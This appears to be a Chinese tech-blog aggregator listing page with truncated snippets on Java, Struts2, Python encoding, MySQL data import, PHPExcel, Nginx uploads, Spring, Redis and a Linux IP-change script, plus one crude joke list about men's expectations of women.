    import java.util.Random; import java.util.Set; import java.util.TreeSet; /** * http://weibo.com/1915548291/z7HtOF4sx * #面试题#有一个数组,每次从中间随机取一个,然后放回去,当所有的元素都被取过,返回总共的取的次数。 * 写一个函数实现。复杂度是什么
  • struts2获得request、session、application方式 chiangfai application
    1、与Servlet API解耦的访问方式。 a.Struts2对HttpServletRequest、HttpSession、ServletContext进行了封装,构造了三个Map对象来替代这三种对象要获取这三个Map对象,使用ActionContext类。 ----->   package pro.action; import java.util.Map; imp
  • 改变python的默认语言设置 chenchao051 python
    import sys sys.getdefaultencoding()  可以测试出默认语言,要改变的话,需要在python lib的site-packages文件夹下新建: sitecustomize.py, 这个文件比较特殊,会在python启动时来加载,所以就可以在里面写上: import sys sys.setdefaultencoding('utf-8') &n
  • mysql导入数据load data infile用法 daizj mysql导入数据
    我们常常导入数据!mysql有一个高效导入方法,那就是load data infile 下面来看案例说明 基本语法: load data  [low_priority] [local] infile 'file_name txt' [replace | ignore] into table tbl_name [fields [terminated by't'] [OPTI
  • phpexcel导入excel表到数据库简单入门示例 dcj3sjt126com PHPExcel
    跟导出相对应的,同一个数据表,也是将phpexcel类放在class目录下,将Excel表格中的内容读取出来放到数据库中 <?php error_reporting(E_ALL); set_time_limit(0); ?> <html> <head> <meta http-equiv="Content-Type"
  • 22岁到72岁的男人对女人的要求 dcj3sjt126com
    22岁男人对女人的要求是:一,美丽,二,性感,三,有份具品味的职业,四,极有耐性,善解人意,五,该聪明的时候聪明,六,作小鸟依人状时尽量自然,七,怎样穿都好看,八,懂得适当地撒娇,九,虽作惊喜反应,但看起来自然,十,上了床就是个无条件荡妇。 32岁的男人对女人的要求,略作修定,是:一,入得厨房,进得睡房,二,不必服侍皇太后,三,不介意浪漫蜡烛配盒饭,四,听多过说,五,不再傻笑,六,懂得独
  • Spring和HIbernate对DDM设计的支持 e200702084 DAO设计模式springHibernate领域模型
    A:数据访问对象     DAO和资源库在领域驱动设计中都很重要。DAO是关系型数据库和应用之间的契约。它封装了Web应用中的数据库CRUD操作细节。另一方面,资源库是一个独立的抽象,它与DAO进行交互,并提供到领域模型的“业务接口”。    资源库使用领域的通用语言,处理所有必要的DAO,并使用领域理解的语言提供对领域模型的数据访问服务。
  • NoSql 数据库的特性比较 geeksun NoSQL
    Redis 是一个开源的使用ANSI C语言编写、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库,并提供多种语言的API。目前由VMware主持开发工作。   1. 数据模型 作为Key-value型数据库,Redis也提供了键(Key)和值(Value)的映射关系。除了常规的数值或字符串,Redis的键值还可以是以下形式之一: Lists (列表) Sets
  • 使用 Nginx Upload Module 实现上传文件功能 hongtoushizi nginx
    转载自: http://www.tuicool.com/wx/aUrAzm   普通网站在实现文件上传功能的时候,一般是使用Python,Java等后端程序实现,比较麻烦。Nginx有一个Upload模块,可以非常简单的实现文件上传功能。此模块的原理是先把用户上传的文件保存到临时文件,然后在交由后台页面处理,并且把文件的原名,上传后的名称,文件类型,文件大小set到页面。下
  • spring-boot-web-ui及thymeleaf基本使用 jishiweili springthymeleaf
    视图控制层代码demo如下:   @Controller @RequestMapping("/") public class MessageController { private final MessageRepository messageRepository; @Autowired public MessageController(Mes
  • 数据源架构模式之活动记录 home198979 PHP架构活动记录数据映射
    hello!架构 一、概念 活动记录(Active Record):一个对象,它包装数据库表或视图中某一行,封装数据库访问,并在这些数据上增加了领域逻辑。 对象既有数据又有行为。活动记录使用直截了当的方法,把数据访问逻辑置于领域对象中。   二、实现简单活动记录 活动记录在php许多框架中都有应用,如cakephp。 <?php /** * 行数据入口类 *
  • Linux Shell脚本之自动修改IP pda158 linuxcentosDebian脚本
    作为一名 Linux SA,日常运维中很多地方都会用到脚本,而服务器的ip一般采用静态ip或者MAC绑定,当然后者比较操作起来相对繁琐,而前者我们可以设置主机名、ip信息、网关等配置。修改成特定的主机名在维护和管理方面也比较方便。如下脚本用途为:修改ip和主机名等相关信息,可以根据实际需求修改,举一反三! #!/bin/sh #auto Change ip netmask ga
  • 开发环境搭建 独浮云 eclipsejdktomcat
           最近在开发过程中,经常出现MyEclipse内存溢出等错误,需要重启的情况,好麻烦。对于一般的JAVA+TOMCAT项目开发,其实没有必要使用重量级的MyEclipse,使用eclipse就足够了。尤其是开发机器硬件配置一般的人。         &n
  • 操作日期和时间的工具类 vipbooks 工具类
       大家好啊,好久没有来这里发文章了,今天来逛逛,分享一篇刚写不久的操作日期和时间的工具类,希望对大家有所帮助。 /* * @(#)DataFormatUtils.java 2010-10-10 * * Copyright 2010 BianJing,All rights reserved. */ package test; impor
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他